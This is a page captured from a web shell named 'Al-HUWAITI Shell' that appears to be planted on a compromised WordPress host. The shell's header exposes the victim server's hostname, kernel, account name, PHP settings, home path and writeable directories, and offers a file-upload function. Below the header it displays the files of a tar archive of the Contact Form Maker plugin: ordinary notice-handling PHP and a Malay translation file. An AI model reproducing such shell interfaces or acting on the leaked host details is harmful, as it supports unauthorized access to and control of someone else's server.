hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/c/h/r/chryzalihi/www/wp-content/languages/themes/the/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/c/h/r/chryzalihi/www/wp-content/languages/themes/the/contact-form-maker.tar
contact_form_maker_notices_class.php000060400000023722152434416630014035 0ustar00<?php

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * FMC_Notices Class
 *
 */
class FMC_Notices {
	static $instance;

	public static function instance() {
		if ( ! isset( self::$instance ) ) {
			self::$instance = new FMC_Notices();
		}

		return self::$instance;
	}

	public $notice_spam = 0;
	public $notice_spam_max = 1;

	// Basic actions to run
	public function __construct() {

		// Runs the admin notice ignore function incase a dismiss button has been clicked
		add_action( 'admin_init', array( $this, 'admin_notice_ignore' ) );

		// Runs the admin notice temp ignore function incase a temp dismiss link has been clicked
		add_action( 'admin_init', array( $this, 'admin_notice_temp_ignore' ) );
		add_action('admin_notices', array($this, 'wd_admin_notices'));

	}

	// Checks to ensure notices aren't disabled and the user has the correct permissions.
	public function fmc_admin_notice() {

		$fmc_settings = get_option( 'fmc_admin_notice' );
		if ( ! isset( $fmc_settings['disable_admin_notices'] ) || ( isset( $fmc_settings['disable_admin_notices'] ) && $fmc_settings['disable_admin_notices'] == 0 ) ) {
			if ( current_user_can(  'manage_options' ) ) {
				return true;
			}
		}

		return false;

	}

	// Primary notice function that can be called from an outside function sending necessary variables
	public function admin_notice( $admin_notices ) {

		// Check options
		if ( ! $this->fmc_admin_notice() ) {
			return false;
		}

		foreach ( $admin_notices as $slug => $admin_notice ) {
			// Call for spam protection
			if ( $this->anti_notice_spam() ) {
				return false;
			}

			// Check for proper page to display on
			if ( isset( $admin_notices[ $slug ]['pages'] ) && is_array( $admin_notices[ $slug ]['pages'] ) ) {
				if ( ! $this->admin_notice_pages( $admin_notices[ $slug ]['pages'] ) ) {
					return false;
				}
			}
			// Check for required fields
			if ( ! $this->required_fields( $admin_notices[ $slug ] ) ) {
				// Get the current date then set start date to either passed value or current date value and add interval
				$current_date = current_time( "n/j/Y" );
				$start        = ( isset( $admin_notices[ $slug ]['start'] ) ? $admin_notices[ $slug ]['start'] : $current_date );
				$start        = date( "n/j/Y", strtotime( $start ) );
				$date_array   = explode( '/', $start );
				$interval     = ( isset( $admin_notices[ $slug ]['int'] ) ? $admin_notices[ $slug ]['int'] : 0 );
				$date_array[1] += $interval;
				$start = date( "n/j/Y", mktime( 0, 0, 0, $date_array[0], $date_array[1], $date_array[2] ) );

				// This is the main notices storage option
				$admin_notices_option = get_option( 'fmc_admin_notice', array() );
				// Check if the message is already stored and if so just grab the key otherwise store the message and its associated date information
				if ( ! array_key_exists( $slug, $admin_notices_option ) ) {
					$admin_notices_option[ $slug ]['start'] = $start;
					$admin_notices_option[ $slug ]['int']   = $interval;
					update_option( 'fmc_admin_notice', $admin_notices_option );
				}

				// Sanity check to ensure we have accurate information
				// New date information will not overwrite old date information
				$admin_display_check    = ( isset( $admin_notices_option[ $slug ]['dismissed'] ) ? $admin_notices_option[ $slug ]['dismissed'] : 0 );

				$admin_display_start    = ( isset( $admin_notices_option[ $slug ]['start'] ) ? $admin_notices_option[ $slug ]['start'] : $start );
				$admin_display_interval = ( isset( $admin_notices_option[ $slug ]['int'] ) ? $admin_notices_option[ $slug ]['int'] : $interval );
				$admin_display_msg      = ( isset( $admin_notices[ $slug ]['msg'] ) ? $admin_notices[ $slug ]['msg'] : '' );
				$admin_display_title    = ( isset( $admin_notices[ $slug ]['title'] ) ? $admin_notices[ $slug ]['title'] : '' );
				$admin_display_link     = ( isset( $admin_notices[ $slug ]['link'] ) ? $admin_notices[ $slug ]['link'] : '' );
				$output_css             = false;
				// Ensure the notice hasn't been hidden and that the current date is after the start date
				if ($admin_display_check == 0 && strtotime( $admin_display_start ) <= strtotime( $current_date )) {

				// Get remaining query string
				$query_str = (isset($admin_notices[$slug]['later_link']) ? $admin_notices[$slug]['later_link'] : esc_url(add_query_arg('fmc_admin_notice_ignore', $slug)));

					// Admin notice display output
					echo '<div class="update-nag fm-admin-notice">';
					echo '<div class="fm-notice-logo"></div>';
					echo ' <p class="fm-notice-title">';
					echo $admin_display_title;
					echo ' </p>';
					echo ' <p class="fm-notice-body">';
					echo $admin_display_msg;
					echo ' </p>';
					echo '<ul class="fm-notice-body fm-blue">
                          ' . $admin_display_link . '
                        </ul>';
					echo '<a href="' . $query_str . '" class="dashicons dashicons-dismiss"></a>';
					echo '</div>';

					$this->notice_spam += 1;
					$output_css = true;
				}
				if ( $output_css ) {
					wp_enqueue_style( 'fmc-admin-notices', WD_FMC_URL .'/css/notices.css?fmc_ver=' . get_option("wd_form_maker_version") );
				}
			}
		}
	}

	// Spam protection check
	public function anti_notice_spam() {

		if ( $this->notice_spam >= $this->notice_spam_max ) {
			return true;
		}

		return false;
	}

	// Ignore function that gets ran at admin init to ensure any messages that were dismissed get marked
	public function admin_notice_ignore() {

		// If user clicks to ignore the notice, update the option to not show it again
		if ( isset( $_GET['fmc_admin_notice_ignore'] ) ) {

			$admin_notices_option = get_option( 'fmc_admin_notice', array() );
			$admin_notices_option[ $_GET['fmc_admin_notice_ignore'] ]['dismissed'] = 1;
			update_option( 'fmc_admin_notice', $admin_notices_option );
			$query_str = remove_query_arg( 'fmc_admin_notice_ignore' );
			wp_redirect( $query_str );
			exit;
		}
	}

	// Temp Ignore function that gets ran at admin init to ensure any messages that were temp dismissed get their start date changed
	public function admin_notice_temp_ignore() {

		// If user clicks to temp ignore the notice, update the option to change the start date - default interval of 14 days
		if ( isset( $_GET['fmc_admin_notice_temp_ignore'] ) ) {

			$admin_notices_option = get_option( 'fmc_admin_notice', array() );

			$current_date = current_time( "n/j/Y" );
			$date_array   = explode( '/', $current_date );
			$interval     = ( isset( $_GET['fmc_int'] ) ? $_GET['fmc_int'] : 14 );
			$date_array[1] += $interval;
			$new_start = date( "n/j/Y", mktime( 0, 0, 0, $date_array[0], $date_array[1], $date_array[2] ) );

			$admin_notices_option[ $_GET['fmc_admin_notice_temp_ignore'] ]['start']     = $new_start;
			$admin_notices_option[ $_GET['fmc_admin_notice_temp_ignore'] ]['dismissed'] = 0;
			update_option( 'fmc_admin_notice', $admin_notices_option );
			$query_str = remove_query_arg( array( 'fmc_admin_notice_temp_ignore', 'fmc_int' ) );
			wp_redirect( $query_str );
			exit;
		}
	}

	public function admin_notice_pages( $pages ) {

		foreach ( $pages as $key => $page ) {
			if ( is_array( $page ) ) {
				if ( isset( $_GET['page'] ) && $_GET['page'] == $page[0] && isset( $_GET['tab'] ) && $_GET['tab'] == $page[1] ) {
					return true;
				}
			} else {
				if ( $page == 'all' ) {
					return true;
				}
				if ( get_current_screen()->id === $page ) {
					return true;
				}
				if ( isset( $_GET['page'] ) && $_GET['page'] == $page ) {
					return true;
				}
			}

			return false;
		}
	}

	// Required fields check
	public function required_fields( $fields ) {
		if ( ! isset( $fields['msg'] ) || ( isset( $fields['msg'] ) && empty( $fields['msg'] ) ) ) {
			return true;
		}

		if ( ! isset( $fields['title'] ) || ( isset( $fields['title'] ) && empty( $fields['title'] ) ) ) {
			return true;
		}

		return false;
	}

	// Special parameters function that is to be used in any extension of this class
	public function special_parameters( $admin_notices ) {
		// Intentionally left blank
	}
	public function wd_admin_notices() {
		$two_week_review_ignore = add_query_arg(array('fmc_admin_notice_ignore' => 'two_week_review'));
		$two_week_review_temp = add_query_arg(array('fmc_admin_notice_temp_ignore' => 'two_week_review', 'int' => 14));
		$notices['two_week_review'] = array(
		  'title' => __('Leave A Review?', 'fm'),
		  'msg' => sprintf(__('We hope you\'ve enjoyed using WordPress %s! Would you consider leaving us a review on WordPress.org?', 'fm'), 'Contact Form Maker'),
		  'link' => '<li><span class="dashicons dashicons-external"></span><a href="https://wordpress.org/support/view/plugin-reviews/contact-form-maker?filter=5" target="_blank">' . __('Sure! I\'d love to!', 'fm') . '</a></li>
					 <li><span class="dashicons dashicons-smiley"></span><a href="' . $two_week_review_ignore . '"> ' . __('I\'ve already left a review', 'fm') . '</a></li>
					 <li><span class="dashicons dashicons-calendar-alt"></span><a href="' . $two_week_review_temp . '">' . __('Maybe Later', 'fm') . '</a></li>
					 <li><span class="dashicons dashicons-dismiss"></span><a href="' . $two_week_review_ignore . '">' . __('Never show again', 'fm') . '</a></li>',
		  'later_link' => $two_week_review_temp,
		  'int' => 14
		);
		$one_week_support = add_query_arg(array('fmc_admin_notice_ignore' => 'one_week_support'));
		$notices['one_week_support'] = array(
		  'title' => __('Hey! How\'s It Going?', 'fm'),
		  'msg' => sprintf(__('Thank you for using WordPress %s! We hope that you\'ve found everything you need, but if you have any questions:', 'fm'), 'Form Maker'),
		  'link' => '<li><span class="dashicons dashicons-media-text"></span><a target="_blank" href="https://web-dorado.com/wordpress-form-maker/creating-form.html">' . __('Check out User Guide', 'fm') . '</a></li>
					<li><span class="dashicons dashicons-sos"></span><a target="_blank" href="https://web-dorado.com/forum/26-form-maker.html">' . __('Get Some Help', 'fm') . '</a></li>
					<li><span class="dashicons dashicons-dismiss"></span><a href="' . $one_week_support . '">' . __('Never show again', 'fm') . '</a></li>',
		  'int' => 7
		);
		$this->admin_notice($notices);
	}

}

languages/form_maker-ms_MY.po000060400000056704152434416630012236 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:01+0400\n"
"PO-Revision-Date: 2015-05-22 17:01+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ms\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Street Address"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Street Alamat Baris 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Bandar:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Negeri / Daerah / Wilayah"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Pos / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "negara"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Mac"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Boleh"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Jun"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Julai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Ogos"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Disember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Kesilapan, kod salah Keselamatan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Ip anda dalam senarai hitam. Sila hubungi pentadbir laman web"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Fail melebihi saiz yang dibenarkan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Maaf, anda tidak dibenarkan untuk memuat naik fail jenis ini."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Kesilapan, fail tidak boleh digerakkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Bidang %s memerlukan catatan yang unik dan nilai ini telah dihantar."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Kesilapan, e-mel tidak dihantar."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Tiada apa-apa jua telah dikemukakan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Borang anda telah berjaya diserahkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Kesilapan, e-mel tidak dihantar."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Alamat e-mel anda telah disahkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "E-mel anda telah berjaya disahkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Pengesahan e-mel anda telah tamat masa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link pengesahan tidak sah."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "medan yang diperlukan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ini bukan alamat e-mel yang sah."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Anda tidak boleh memilih tarikh bekas. Pilih tarikh bermula dari satu "
"semasa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "Ini"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "nilai mesti di antara"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kuantiti"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Skor anda hendaklah tidak kurang daripada"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Tajuk:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Pertama"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "terakhir"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Tengah"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Kod Kawasan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Nombor Telefon"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Dari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Untuk"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "pergi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "menetapkan semula"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

